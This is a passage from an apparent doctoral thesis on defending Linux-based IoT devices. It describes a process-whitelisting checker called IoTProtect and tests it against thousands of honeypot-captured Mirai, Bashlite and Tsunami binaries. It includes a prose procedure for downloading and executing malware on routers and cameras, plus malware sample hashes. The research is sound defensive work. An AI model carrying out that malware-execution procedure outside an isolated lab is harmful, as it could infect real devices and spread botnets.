256 MB RAM
100 MB free disk
space
Additional
management server
[95]
In addition to the commercial security software, there are many studies that deal with the
protection of low-cost IoT devices [35]. These have deployment costs similar to the commercial
options resulting from required firmware modifications.
6.2. Preliminaries
6.2.1. Linux processes information
Linux is a free OS developed by many companies and groups. The GNU/Linux system is the
core component, which is branched off into many different Linux distributions [96]. Among these
distributions, such as Fedora, Ubuntu, Debian, and Mandriva Linux, there is a common design
called the “proc” filesystem for providing system information to users or applications. This
filesystem is not associated with any hardware device such as disk drives. Instead, “proc” is an
agent into the running Linux kernel. Files in the “proc” filesystem are objects that behave
similarly to normal files but provide access to parameters, data structures, and statistics in the
kernel. The contents of these files are not always fixed, but are generated on the fly by the Linux
73
kernel when the file is read. For embedded Linux systems, users can use open source tools such
as the Yocto Project to produce their distribution [97]. The Yocto tool retains the feature that
supports the “proc” and “sys” filesystems [98]. Therefore, users and applications can read process
information using “proc” on an embedded Linux system as long as the device developers are
willing.
The “proc” filesystem contains a directory entry for each process running on a Linux system.
The name of each directory is the process identifier (ID) of the corresponding process. These
directories appear and disappear dynamically as processes start and terminate on the system. Each
directory contains several entry files providing information regarding the running process [99].
There are three entry files that contain pathname or filename information regarding the binary of
the corresponding process:
l The “exe” file is a symbolic link that points to the executable image running in the process.
l The “maps” file displays the range of addresses in the process’s address space into which
the file is mapped, the permissions on these addresses, the name of the file, and other
information.
l The “cmdline” file records the complete command line for the process unless the process is
a zombie or kernel. In the zombie process, there is nothing in the file [100].
As shown in Fig. 21, users and applications can find the pathname of the running process.
Moreover, if there is a whitelist of benign binaries' pathnames, we can distinguish normal and
abnormal processes.
74
Fig. 21 Format of the maps [100]
6.2.2. Files in IoT devices
In this method, we focus on Linux-based IoT devices because many open-source OS’s for IoT
devices are based on Linux distributions, such as Brillo, OpenWrt, and Ostro Linux [101]. Linux
has a single hierarchical directory structure that starts from the root directory, represented by “/”
and then expands into sub-directories. The Filesystem Hierarchy Standard (FHS) defines the
directory structure and contents in most Linux distributions [102]. However, IoT devices can
apply various storages such as flash storage. This kind of IoT device can contain multiple
filesystems in one device. For example, the ASUS Wi-Fi router RT-AC3200 mounts nine
filesystems, according to the “/proc/mounts” file shown in Fig. 22. The format and meaning of
each line are as follows [100] [103]:
1. The first field specifies the device that is mounted.
2. The second field specifies the mount point.
3. The third field specifies the filesystem type.
4. The fourth field describes whether the filesystem is mounted read-only (ro) or read-write
(rw).
5. The fifth field is used by the “dump” command to determine which filesystems are to be
75
dumped.
6. The sixth field is used by the “fsck” command to determine the order in which filesystem
checks are performed at boot time.
Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200
The “rootfs” filesystem is a simple filesystem that exports Linux's disk caching mechanisms as
a dynamically resizable random access memory (RAM)-based filesystem [104]. “Squashfs” is a
compressed read-only filesystem for Linux and is intended for general read-only filesystem use,
for archival [105]. “Devtmpfs” permits the kernel to create an instance called “devtmpfs” very
early at kernel initialization. Every device will provide a device node in “devtmpfs” before any
driver-core device is registered. “Devtmpfs” can be changed and altered by users at any time [106].
The “proc” filesystem contains system information, and the files in “/proc” are generated by the
kernel on the fly [99]. The “tmpfs” filesystem is a temporary file storage facility on many Unix-
like operating systems. It does not use traditional non-volatile media to store file data; instead,
“tmpfs” files exist solely in a virtual memory maintained by the UNIX kernel [107]. “Sysfs” is a
pseudo filesystem provided by the Linux kernel that exports information regarding various kernel
subsystems, hardware devices, and associated device drivers [108]. “Devpts” is a virtual
filesystem available in the Linux kernel since version 2.1.93 (April 1998). It is usually mounted
76
at /dev/pts and contains solely device files representing slaves to the multiplexing master located
at /dev/ptmx [109]. “JFFS2” is a log-structured filesystem designed for use on flash devices in
embedded systems. It is based on the work begun in the original JFFS by Axis Communications,
AB [110]. The “usbfs” filesystem is a dynamically generated one, similar to the “proc” filesystem.
“Usbfs” complements the normal device node system and can be used to write user space device
drivers [111].
Based on the privileges and features of these filesystems, we categorize three kinds of files in
Linux-based IoT devices:
l Writable files
l Read-only files
l On-the-fly files
Writable files are those that come from user-writable filesystems. Most of them are the
input/output (I/O) of systems or configuration files. A read-only filesystem comes from some
mounted image or read-only filesystems. The files are libraries and applications for creating the
functions and services of IoT devices. On-the-fly files are the files that are in the “proc” or “usbfs”
filesystems, are in the kernel, or are generated dynamically by users. The whitelist criteria are
simple. First, ignore on-the-fly files because they are system information entries or mounted by
USBs outside the device. Secondly, create the whitelist of pathnames by read-only files. There
are many libraries and executable files in a read-only filesystem. Finally, create the whitelist of
hashing values by writable files. For example, there are 14,514 files in the ASUS RT-AC3200
Wi-Fi router. The distribution of the files is shown in Fig. 23. Of these files, 79% are on-the-fly
files generated by the kernel. Therefore, the number of files to be whitelisted is only 3,048.
77
Fig. 23 Distribution of ASUS RT-AC3200 files
6.2.3. Major premises of IoTProtect
We assume that IoTProtect is implemented by the device developers and uses the whitelists
they created. There are four conditions. First, the checker and whitelists must be merged into the
kernel or executed in the initial process to prevent attackers or malware from killing the checker
process. Second, we assume that the developers do not use the “mmap” function to produce
anonymous mappings. There is a case when the pathname fields of maps in “/proc” are blank.
This is an anonymous mapping as obtained via the “mmap” function of the C language. There is
no easy means of coordinating this back to a process's source, as there is no field giving the
pathname [100]. Therefore, this is a constraint under which the developers must develop their
devices in order to implement IoTProtect. More precisely, when loading files into memory, they
must not set the "MAP_ANONYMOUS" argument for creating memory mappings. Third, the exe
files in “/proc” can sometimes lose the links to the pointed files. Under Linux 2.2 and later, the
exe files in “/proc” are a symbolic link containing the actual pathnames of the executed commands.
Attempting to open an exe file will indeed open the original executable. However, this symbolic
link can typically be dereferenced. If the pathname has been unlinked, the symbolic link will
78
contain the string '(deleted)' appended to the original pathname. In a multithreaded process, the
contents of this symbolic link are not available if the main thread has already been terminated
[100]. Developers must not dereference the exe link to create hash values of the executable
binaries. Moreover, the hash algorithm must be available on the IoT device. Note that we use
MD5 for the actual implementation of IoTProtect tested in the following evaluation. Fourth, if the
developer would like to apply whitelists of cmdline content, the libraries and application files
must be allocated in read-only partitions. Furthermore, the full or unique pathname of the
corresponding binaries must be included in the command line to prevent file replacement or false
positives.
6.3. IoTProtect
IoTProtect is a whitelisting method for protecting low-cost IoT devices. IoTProtect consists of
three whitelists and a checker program. The pathname whitelist is a list of pathnames of all
legitimate executables. The hash value whitelist records MD5 hash values of binaries on IoT
devices. The comparison and whitelist of cmdline content are optional and performed only if there
are processes that cannot display their pathname and exe links in the “proc” filesystem.
We first explain the creation of whitelists. Here we assume that the device to be protected has
already been developed and that the device developer is to install IoTProtect on top of the existing
system. We skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O
files. If developers know precisely which executable files to include on the whitelist, they can
create their own whitelist manually. However, recent IoT device products are often not developed
by a single manufacturer, and each developer does not know all of the legitimate executables
exactly. In such a case developers can still create whitelists that include all executables existing
in the system by using the Linux command “find” with the “-exec” expression and “md5sum.”
79
Moreover, the cmdline whitelist can be created by “find” with the “-exec” expression and “cat”
Linux commands.
IoTProtect conducts process checks through the following steps. The input data come from
entry files of the “proc” filesystem and whitelists. The output is the removal of malicious
processes. The notations used in the pseudocode are shown in Table 28.
Table 28 Table of symbols.
Notations Definitions and Descriptions
T Integer variable, the period of process checker
N Integer variable, number of processes to be checked
M Set of /proc/[pid]/maps files
Cmd Set of /proc/[pid]/cmdline files
CL Set of cmdline
PN Set of pathnames
WLP, H, C Whitelists of the pathname, hash value, and cmdline
Pn1, Pn2 Entity of pathname
Pid1, Pid2 Entity of process id
E1, E2 Entity of exe links
H1, H2 Entity of hash value
SP Set of suspicious process id
Cl1, Cl2 Entity of cmdline content
MD5 (Ei) Calculate the MD5 hash value of the linked binary
Comp (S,
WL)
Comparison of set S and whitelists
Kill (S) Kill the process of set S by its Pid
Sleep (t) Pause process checker of IoTProtect for t seconds
← Assignment
- Remove entities from the set
A, B, C, D Sets
|D| Size of set ‘D’
80
We explain the details of the IoTProtect procedures with the following pseudocode:
1. while true
2. find and grep Pni from M, i = 1 to n
3. PN ← {Pn1, Pn2, …, Pnn}
4. Comp (PN, WLP)
5. SP ← {Pid1, Pid2, …, Pidj} ∀Pidi ∈ A: Pni ∉ WLP, i = 1 to j
6. Hj ← MD5(Ej) ∀Ej ∈ B: Pidi ∈ SP, j = 1 to |SP|
7. H ← {H1, H2, …, Hj}, j = 1 to |SP|
8. Comp (H, WLH)
9. SP–{Pid1, Pid2, …, Pidk} ∀Pidk ∈ C: Hk ∈ WLH
/*optional step of cmdline whitelisting */
10. find and grep Cli from Cmd, i = 1 to n
11. CL ← {Cl1, Cl2, …, Cli}, i = 1 to n
12. Comp (CL, WLC)
13. SP–{Pid1, Pid2, …, Pidr} ∀Pidr∈D: CLr∈WLC
/*optional step of cmdline whitelisting */
14. Kill(SP)
15. Sleep(t)
16. Endwhile
IoTProtect first filters processes that are not included in the pathname whitelist, and then filters
the remaining processes according to the hash value whitelist. It then filters the remainder with
81
the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it
removes all remaining processes.
6.4. Evaluation
We developed a prototype of IoTProtect using shell scripts with Linux commands and AWK
scripts, such as grep, find, and head. We conducted experiments with four actual IoT devices and
4,981 malware binaries captured by our IoT honeypot for evaluation. We show three different
experiments to evaluate the effectiveness and overhead of IoTProtect.
6.4.1. Data collection and experimental devices
We chose four IoT devices for conducting experiments. These devices were known to be
vulnerable and compromised by IoT malware [112] [113] [114]. The brands and specifications of
the devices are listed in Table 29. According to their disk information, previous commercial
products cannot be installed on the four devices. The Dahua IPC-HFW3300 does not support
MD5 hash libraries. Therefore, IoTProtect checks only the pathnames and cmdline of
corresponding processes in the IP Camera.
Table 29 IoT devices used in conducting the experiments.
IoT
Device
Model CPU
Arch.
CPU
spec.
RAM
(MB)
Disk
(MB)
Appr.
Price
Dahua
IPC-HFW3300
IP
Camera
ARM 300
MHZ
92 8 325
USD
ASUS
RT-AC3200
Wi-Fi
Router
ARM 1GHz
2cores
256 30.8 199.99
USD
ASUS
RT-N66U
Wi-Fi
Router
MIPSEL 600
MHZ
256 22.3 84.99
USD
PRINCETON
ShAirDisk
Wi-Fi
storage
MIPSEL 360
MHZ
28 4.6 26.7
USD
82
IoTPOT collected 4,981 different IoT malware binaries for ARM and MIPSEL from January
2016 to March 2017. The malware labels, such as Bashlite, Tsunami, and Mirai, come from local
scans by Kaspersky, an anti-virus engine. We consider Kaspersky, from our previous experience
of submitting 12,000samples to the Virustotal web service application programming interface
(API), to be one of the most reliable anti-virus products for IoT malware [115]. VirusTotal is a
website that aggregates many antivirus products and online scan engines [116]. The distribution
of our malware samples is shown in Table 30.
Table 30 IoT malware used for conducting the experiments.
CPU Bashlite Tsunami Mirai sum.
ARM 3123 51 74 3248
MIPSEL 1514 27 192 1733
All 4637 78 266 4981
6.4.2. Removal experiment
6.4.2.1. Design of experiment
We conducted experiments involving the malware removal process on the four IoT devices as
follows:
1. Login to the device as root via telnet.
2. Download malware using the “wget” or “tftp” command.
3. Assign the “755” privilege to the malware binary.
4. Execute the downloaded malware.
5. Conduct a process check using IoTProtect
6. Check whether IoTProtect can kill the malware process.
83
6.4.2.2. Experimental Results
The results are shown in Table 31. We see that there are many segmentation faults (7% to 14%)
and bus errors (0% to 0.8%) when we execute the malware binaries on these devices. There are
two ARM malware binaries and one MIPSEL binary that finished execution before we started
process checks of IoTProtect. These three malware binaries are similar and contain the same
functions in their binaries. All they attempted was to install python on target devices using “apt-
get” and “yum.” When the installation failed as a result of the installation utilities not being
available on these devices, the malware simply terminated. The complete execution of the
malware takes less than one second, and the process disappeared after termination. The purpose
of the malware is to infect an IoT OS that can install python, such as the IBM Watson IoT Platform
[117]. IoTProtect successfully removed the processes of all but three of the malware binaries. The
success rate of removal by IoTProtect against triggered malware was 99.92% if the above three
cases are considered as failed protection, but was 100% if they are considered as successful
protection because the malware could not function properly.
Table 31 Results of the removal experiments.
IoT Devices model CPU
Arch.
Kill Segmentat
ion fault
bus error fail
IPC-
HFW3300
IP Camera ARM 2774 446 26 2
RT-AC3200 Wi-Fi
Router
ARM 2732 483 31 2
RT-N66U Wi-Fi
Router
MIPSEL 1608 123 1 1
ShAirDisk Wi-Fi
storage
MIPSEL 1622 108 2 1
84
The overheads of IoTProtect on the four devices are shown in Table 32. The disk overheads
include the sizes of whitelists. The size of the IoTProtect checker program is only 1.6 kB. Our
pathname whitelist includes all of the pathnames from the read-only filesystem. The manufacturer
of a device might use a more efficient whitelist. The central processing unit (CPU) overheads are
the maximum values during execution time. The three devices other than the IPC-HFW3300 can
finish a process check of IoTProtect in four seconds. Despite the fact that the IP Camera spent 44
seconds executing the checker program, the original monitor and display systems of the camera
functioned normally without delays.
Table 32 IoTProtect overheads.
IoT
Devices
Model Disk
overhead
CPU
overhead
Time
cost
IPC-
HFW3300
IP
Camera
124.5K 24% 44 sec
RT-
AC3200
Wi-Fi
Router
288.4K 7% 2 sec
RT-N66U Wi-Fi
Router
176.5K 17.6% 2 sec
ShAirDisk Wi-Fi
storage
155.5K 19% 4 sec
6.4.3. Mitigating outgoing attacks
In reality, IoTProtect would continuously check existing processes in some designated time
interval. Therefore, it is important to ask whether IoTProtect is sufficiently fast to kill a malware
process before it conducts outgoing attacks against other devices. To measure the worst case, we
chose a Mirai variant, one of the fastest spreading IoT worms, which conducts a telnet scan on
85
port 2323/tcp right after its execution before even connecting its command-and-control server.
The MD5 hash value of the sample is “d6e99a59d44b83e8360745145fa5d2b3.”
6.4.3.1. Design of experiment
As shown in Fig. 24, we conducted the experiment on the ASUS RT-AC3200 Wi-Fi Router.
All traffic is contained in a LAN network. At the beginning of the experiment, we executed
malware. After a fixed interval, we executed IoTProtect to conduct a process check. To simulate
different detection timings, we started the process check of IoTProtect at one, five, ten, 20, 30,
and 60 seconds after malware execution, respectively. We then measured how many packets went
out from the devices before the IoTProtect checker killed the malware process. We conducted this
trial 100 times for each setting.
Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect
86
6.4.3.2. Experimental results
The results of the experiment are illustrated in Fig. 25. Those results confirm that IoTProtect
cannot block every scan by Mirai but does reduce the number of scan packets significantly.
Measurement shows that this Mirai variant generates nearly 2,000 scan packets for one minute
after it begins its execution and would continue to scan at the same rate if it were not killed by
IoTProtect.
Fig. 25 Results of experiment on mitigating outgoing attacks
6.4.4. Trade-off between security and device performance
We measured the impact of IoTProtect on the performance of the devices. We chose a low-cost
device, ShAirDisk, and analyzed the trade-off between the security and overhead of IoTProtect.
6.4.4.1. Experimental design
As illustrated in Fig. 26, we conducted this experiment in a location at which there were no
other Wi-Fi access points. Then, we uploaded a 200 MB file five times into Wi-Fi storage to
measure the device performance for uploading files. We conducted this experiment under two
conditions, one with only IoTProtect running and the other with IoTProtect and malware running.
87
The same procedure as in the previous experiment was followed for malware execution. The MD5
hash of the Mirai variant used for this experiment is “018cb18e9cb415af453ee020fa33aa28.”
Fig. 26 Experimental environment for measuring the trade-off between performance and security
6.4.4.2. Experimental results
Fig. 27 presents the different upload time costs under different intervals of IoTProtect. In the
figure, the values of the blue bars are the average upload times in a situation with only IoTProtect.
The values of the orange bars are the average upload times in the situation in which both malware
and IoTProtect are executed. We can see that the differences between the orange and blue bars in
the same interval are not significant, measuring less than 12.4 seconds. This means the malware
infection caused a limited delay of fewer than 12.4 seconds of file upload time. However, if we
shorten the interval of IoTProtect process checks to 1.0 second to increase security, the overhead
increases significantly, measuring a 55% increase in upload time compared to the case without
IoTProtect. On the other hand, we can also see that intervals of more than 30 seconds do not harm
performance significantly.
88
Fig. 27 Results of experiment measuring trade-off
6.4.5. Evaluation of easy deployment
The deployment of IoTProtect involves two steps, the creation of whitelists and the
installation of the IoTProtect checker. We create worst-case whitelists as we are not the developers
of these devices. These whitelists can filter out only “sysfs,” “proc,” “usbfs,” f, and I/O files. The
time costs are shown in Table 33. General users can quickly create worst-case whitelists in only
a few minutes.
Table 33 Cost of creating whitelists.
IoT Devices model whitelists
size
whitelists time
cost
IPC-HFW3300 IP Camera 123.0K *29 sec
RT-AC3200 Wi-Fi Router 285.9K 218 sec
RT-N66U Wi-Fi Router 175.0K 157 sec
ShAirDisk Wi-Fi storage 154.0K 188 sec
*This IP camera lacks hash libraries and contains some processes without pathname and valid exe links.
89
We created the cmdline whitelist instead of hash value whitelists.
The installation procedure for the IoTProtect checker is very light and quick. The checker
program is written using Bash scripts, leading to portability between different Linux distributions.
Moreover, the fact that the size of the checker program is only 1.5KB resulted in easily
deployment on low-cost IoT devices. Finally, the installation procedures of this program include
only a copy of a file and assignment of the execute privilege. The checker script was executed
independently of most Linux kernel modules. Users can easily invoke it in the Linux startup
process and have it run in the background or as a daemon.
6.5. Discussion
From the removal experiment, we see that our method applies to different CPU architectures
and models of IoT devices. Furthermore, IoTProtect successfully removed several thousand
different malware processes with nearly 100% success. According to the mitigation of outgoing
attacks, IoTProtect reduced the scan attack traffic caused by a rapidly spreading Mirai variant,
even if the process check is not very frequent. The results of the performance experiment show
that IoTProtect can be installed in some low-cost devices without a significant drop in
performance if the process checking interval is configured appropriately.
We found that IoTProtect was significantly slow when implemented in one of the tested devices,
the Dahua IP Camera, as shown in Table 31. We could improve the performance of IoTProtect by
implementing it in the C language and by reducing the size of the whitelists. According to a
comparative study of programming languages in 2015, C is the best language for computing-
intensive tasks [118]. Moreover, the whitelists we created for the experiments in the worst case
contain thousands of pathnames and MD5 hashing values. Manufacturers can build much better
whitelists for their products.
90
For mitigating outgoing attacks, we find that IoTProtect cannot block all outgoing scan packets.
It can remove the malware process, but the malware has already conducted thousands of scan
packets before it is killed. We consider this shortcoming to be a limitation of IoTProtect. If we
shorten the interval of IoTProtect’s process checks from 60 seconds to 20 seconds, 66% of scan
packets can be reduced. Moreover, an interval of one second could stop 96.72% of the scan
packets that could have been sent out in one minute. Note that we used a Mirai variant, one of the
fastest known IoT worms that begins scanning right after execution as the worst-case scenario.
However, most Mirai malware would connect the command-and-control server first and then start
the scan and DoS attack after receiving commands. Hence, in most real cases, IoTProtect could
have blocked most of the outgoing attacks within an acceptable time interval.
Our performance experiment on Wi-Fi storage shows that the file upload speed of the device is
significantly affected by the interval of IoTProtect’s process check. On the tested Wi-Fi storage
devices, the best interval can be 20 to 30 seconds, which will introduce a 7.1% to 12.4% increase
in file upload time while protecting from and mitigating most of the attacks by the malware
infection, as discussed above.
IoTProtect is easy to deploy, but creation of the proper whitelists can take some effort.
Supposing that the developers use some third-party libraries and an open source OS for their IoT
products, they might know only the processes caused by their own applications and have limited
information for all of the other benign processes. In such a case, the developers must pick up all
execution files installed in the device, such as the files in “/bin’ and “/usr/bin,” as we did in the
experiment. When they conduct a software testing process, they must record all of the created
processes to avoid false positive detection by IoTProtect.
91
6.5.1. Comparison with previous studies
l The method by Paleari et al. must apply QEMU and behavior clustering [32], which are too
expensive to implement on low-cost devices.
l Shahzad et al. analyzed 11 features from the kernel and achieved 93% detection accuracy
[33]. However, the system requests many features, executes a decision tree algorithm, and is
difficult to install on low-cost devices. IoTProtect, in contrast, was able to remove 99.92%
of malware processes from four thousand malware binaries. We assume here that our method
does not cause false positives as long as the whitelist is created appropriately by the device
developers. However, as discussed in the previous section, the creation of whitelists can
involve difficulties during the manufacturing process. Our future work will include
investigating proper whitelisting.
l Tamiya et al. investigated a simple solution for malware removal by rebooting the device,
which can be applied to low-cost IoT devices [34]. However, they do not offer the detection
methodology of the malware infection, and they also mention that the connected vulnerable
devices would again be infected after removal unless the vulnerability is fixed. Therefore,
their solution would not be able to defend the device.
l There are platform and resource constraint issues for McAfee Embedded Control 6.x. These
solutions cannot be installed on low-cost IoT devices. Moreover, McAfee Embedded Control
6.x must rebuild the kernel when installed on a Linux distribution, introducing significant
engineering cost, especially if deployed on existing commercial products.
l Koike et al. developed a whitelisting-type execution control module “WhiteEgret” on Linux
[35]. Similarly to McAfee Embedded Control, WhiteEgret also builds the Linux kernel upon
installation, also introducing substantial engineering cost.
92
6.5.2. Limitations
IoTProtect does have some limitations. Many of the limitations come from the design of Linux
process information and our whitelisting idea. First, IoTProtect depends on exe and maps entries
in the “proc” filesystem. Kernel-level malware and toolkits that disable or alter these
functionalities would evade detection by IoTProtect. Moreover, checks and removal by
IoTProtect are performed on filesystems, with the result that code injection on a legitimate process
in memory cannot be detected.
Second, the defense offered by IoTProtect is not prevention but mitigation of malware infection.
It would help substantially in defending against long-lasting malicious activities such as DDoS,
spamming, bitcoin mining, click fraud, and stepping stones for other attacks. On the other hand,
attacks that can be performed in a very short time, such as credential and privacy data exfiltration,
might not be mitigated well. Applying a whitelist before malware execution would require process
creation hooking. We did not choose this approach for two reasons. First, the hooking of process
creation would involve modification of the Linux kernel [119] and hence increase the deployment
cost for device developers. We believe that IoTProtect is easier to implement and use than the
hooking method. Second, hooking every process creation and checking all created processes
before they are executed would slow down the principal functionality of the devices, especially
at the time of device boot-up when many processes are created and checked.
For new IoT devices, developers can select and build their secure OS distribution. However,
changing an OS against existing devices is not easy. First, extending the resources of a device is
difficult; if the RAM, CPU, or hard disk is insufficient, a secure OS cannot be installed on the
devices. Second, changing the OS would require manufacturers to re-examine device test cases.
Testing cases that include stability or burn-in testing, i.e., running devices with different voltages
for several months, would consume substantial labor and time. Third, some Linux secure modules
93
are kernel space programs applying a whitelist mechanism. Such modules affect the activation of
all kernel and user space applications. Installing the module led to rebuilding the OS kernel and
re-examining all kernel and user space applications. IoTProtect is a user space application.
Therefore, developers and manufacturers need examine only the user space applications, e.g., user
applications cannot kill kernel processes. According to a Gartner report, there are more than 8.4
billion connected IoT devices in use worldwide since 2017 [1]. Moreover, most of these devices
lack defense mechanisms. IoTProtect is a simple solution for them with lower development and
testing costs.
There are four major conditions that a developer must follow in order to deploy IoTProtect as
described in Section 6.2.3. These can be the constraints for device developers. In addition, if the
conditions are not satisfied by existing devices, this might require additional effort to modify the
firmware, thereby limiting the advantage of easy deployment. We can at least say that these
conditions are satisfied for the four existing devices we tested.
94
Chapter 7.
Conclusion and future works
7.1 Conclusion
In recent years, the cyber threat against IoT has become a reality. Mirai Botnets executed the
massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. The report from
Kaspersky in Sept. 2018, shows Mirai is still the most popular IoT malware family for
cybercriminals (20.9%). Besides, the IoT malware keeps evolving and exploits multiple
vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families
that assimilate many known exploits affecting the Internet of Things (IoT) devices. These exploits
come from 11 makers' devices over HTTP, UPnP, Telnet, and SOAP protocols. Hence the
observation tool of cyber attacks in IoT should be reconsidered and evaluated. For observation of
these complicate attack vectors, we applied physical IoT devices to build the honeypot. However,
physical IoT devices bring challenges to management and information leak problems.
In chapter 3, we introduce frequent cyber attacks against IoT. Also, then we describe an
observation and analysis framework and countermeasure of cyber attacks in IoT. First is
techniques to support honeypot consisted of physical IoT devices. The MITM proxy can control
incoming and outbound traffic of the honeypot, filter out unwanted attack flow, and prevent
information leak. Second is techniques of analyzing massive data of IoT honeypot. We apply text-
mining and machine learning algorithms to find new attack vector and categorized known Botnets'
attacks. The third is a whitelisting-based countermeasure against cyber attacks in IoT. Moreover,
we showed how to protect the IoT devices in the honeypot from unwanted cyber attacks. Also,
we present how to create an appropriate view which analyzes the incoming data in depth and
utilize our resource efficiently. Finally, we showed a method to recognize the IoT malware process
95
by examining the pathname and binaries hash value hidden in "/proc" folder.
In chapter 4, we combine the ability of the transparent proxy and web tracking library, develop
a supporting mechanism for honeypot consisted of physical IoT devices. ThingGate can improve
the security of honeypot, extend the functionality of web tracking, manage the incoming traffic,
and output response content via MITM way. We evaluated ThingGate on the public internet, prove
the effectiveness of ThingGate. In our observation, ThingGate did not yield the cyber attacks
against physical devices, such as RCE attack and long term peeping. In our experimental result,
we successfully track a USA attacker use multiple IP addresses visit our honeypot. To handle the
unwanted incoming flow, we prove that ThinkGate can block traffic which change critical
configuration. Moreover, ThingGate collected 149 malware binaries and 23 scripts from 411
misplaced CI-URL, which employed seven vulnerabilities. Furthermore, ThingGate fooled seven
clients who requested the Wi-Fi AP list in WebUI with fabricated AP.
In chapter 5, we analyzed 22.9GB Telnet log and 5616 different malware binaries collected by
IoT honeypot. We filtered 2.7millions infection logs and mapping to 44,834 ECTs. And conduct
classification and clustering analysis on the ECTs. The confusion tables and the accuracy of our
classification method led to several definite conclusions. First, the lowest accuracy of all the ECTs
was 0.9675, indicating that even for a dataset spanning nine months, our method remained valid.
Although command sequences can change many times, the use of trigram features can accurately
distinguish Mirai, Bashlite, and Hajime malware, based on differences in their infection command
patterns. These malware categories have distinctive command patterns, and the hidden feature
can be extracted for further analysis. Second, we demonstrated that using clustering with a trigram
sequence can detect variant attack patterns (for example, wget DoS attack) and facilitate
identification of similarities between different malware families, without requiring the collection
of malware binaries.
96
In chapter 6, we have shown that IoTProtect is a valid solution that can remove IoT malware
processes with reasonable implementation and resource costs. Moreover, we implemented a shell
script prototype and showed that it could be executed successfully on low-cost IoT devices, such
as Wi-Fi routers and storage, with marginal cost. We tested more than four thousand different IoT
malware binaries, and IoTProtect removed 99.92% of these malicious processes successfully.
7.2. Future works
The cyber attacks in IoT keep evolving and diverse purposes. In this study, we use honeypots
to observe existing attacks, analyze threats, and to reflect it to implement a whitelist-based
protection method. We think that extending the observation scope for more protocols and deeper
local area networks (LAN) is essential. The knowledge that obtains from honeypots and analysis
can also be utilized to protect the devices in a proactive way, such as IDS or early-warning system
to detect newly evolving attacks. Thus, future works should focus on how to implement advanced
honeypots and network-based countermeasures against cyber attacks in IoT.
97
Bibliography
[1] L. J., Rivera, and L., Goasduff, "Gartner says a thirty-fold increase in internet-connected
physical devices by 2020 will significantly alter how the supply chain operates," Gartner,
https://www.gartner.com/newsroom/id/2688717, accessed Jan. 18. 2019.
[2] P., Loshin, “Details emerging on Dyn DNS DDoS attack, Mirai IoT botnet,” TechTarget
network, http://searchsecurity.techtarget.com/ news/450401962/Details-emerging-on-Dyn-
DNS-DDoS-attack-Mirai-IoT-botnet, accessed Feb. 06. 2019.
[3] R, Nigam, “Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns,” Unit42,
https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-
campaigns/, accessed Feb. 06. 2019.
[4] Y.M.P., Pa, S., Suzuki, K., Yoshioka, T., Matsumoto, T. Kasama, and C., Rossow, “IoTPOT:
A Novel Honeypot for Revealing Current IoT Threats,” Journal of Information Processing,
Vol.24, No.3, pp.522–533, 2016.
[5] J. D., Guarnizo, A., Tambe, S. S., Bhunia, M., Ochoa, N. O., Tippenhauer, A., Shabtai, & Y.,
Elovici, “Siphon: Towards scalable high-interaction physical honeypots,” In Proceedings of
the 3rd ACM Workshop on Cyber-Physical System Security, pp. 57-68, April, 2017.
[6] T., Luo, Z., Xu, X., Jin, Y., Jia, & X., Ouyang, "Iotcandyjar: Towards an intelligent-
interaction honeypot for iot devices." Black Hat, 2017.
[7] Y., Ezawa, K., Tamiya, S., Nakayama, Y., Tie, K., Yoshioka, and T., Matsumoto, “An
Analysis of Attacks Targeting WebUI of Embedded Devices by Bare-metal Honeypot,” In
Computer Security Symposium 2017, Oct., 2017.
[8] M., Kuzin, Y., Shmelev, and V., Kuskov, "New trends in the world of IoT threats," AO
Kaspersky Lab, https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/,
accessed Feb. 6. 2019.
98
[9] Carnegie Mellon University. "The ‘Only’Coke Machine on the Internet,"
https://www.cs.cmu.edu/~coke/history_long.txt, accessed Feb. 6. 2019.
[10]R.S., Raji, "Smart networks for control." IEEE spectrum 31, no. 6 (1994): 49-55.
[11]K., Ashton, "That ‘internet of things’ thing." RFID journal22, no. 7 (2009): 97-114.
[12]H., Eero, J., Grönvall, and K., Främling. "Tracking and tracing parcels using a distributed
computing approach." Proceedings of the 14th Annual conference for Nordic researchers in
logistics (NOFOMA'2002), Trondheim, Norway. 2002.
[13]E., Dave. "The internet of things: How the next evolution of the internet is changing
everything." CISCO white paper 1, no. 2011
[14]R., Puri, "Bots &; Botnet: An Overview," SANS Institute. https://www.sans.org/reading-
room/whitepapers/malicious/bots-botnet-overview-1299, accessed June. 20. 2019.
[15]A. Tellez, “Bashlite,”, GitHub, https:// github.com/anthonygtellez/BASHLITE, accessed
Jan. 18. 2019.
[16]A., Manos, T., April, M., Bailey, M., Bernhard, E., Bursztein, J., Cochran, Z., Durumeric et
al. "Understanding the mirai botnet." In 26th USENIX Security Symposium (USENIX
Security 17), pp. 1093-1110. 2017.
[17]K., Tamiya, Y., Ezawa, Y., Tie, S., Nakayama, K., Yoshioka, and T., Matsumoto,
"Observation of Peeping using Decoy IP Camera," In Symposium on Cryptography and
Information Security 2018, Jan., 2018.
[18]T. F. Yen, V. Heorhiadi, A. Oprea, M. K. Reiter, and A. Juels, “An epidemiological study of
malware encounters in a large enterprise,” In Proceedings of the 2014 ACM SIGSAC
Conference on Computer and Communications Security, ACM, pp. 1117-1130, 2014.
[19]M. M. Masud, L. Khan and B. Thuraisingham, “A scalable multi-level feature extraction
technique to detect malicious executables,” Information Systems Frontiers, vol. 10, no. 1,
99
pp. 33-45, 2008.
[20]M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, and G. Giacinto, “Novel feature
extraction, selection and fusion for effective malware category classification,” In
Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy,
ACM, pp. 183-194, 2016.
[21]J. Drew, T. Moore, and M. Hahsler, “Polymorphic Malware Detection Using Sequence
Classification Methods”, In Proceedings of 2016 IEEE Security and Privacy Workshops
(SPW), 2016.
[22]F. Shahzad and M. Farooq, “ELF-Miner: using structural knowledge and data mining
methods to detect new (Linux) malicious executables,” Knowledge and information
systems, vol. 30, no. 3, pp. 589-612, 2012.
[23]J. Bai, Y. Yang, S. Mu, and Y. Ma, “Malware detection through mining symbol table of
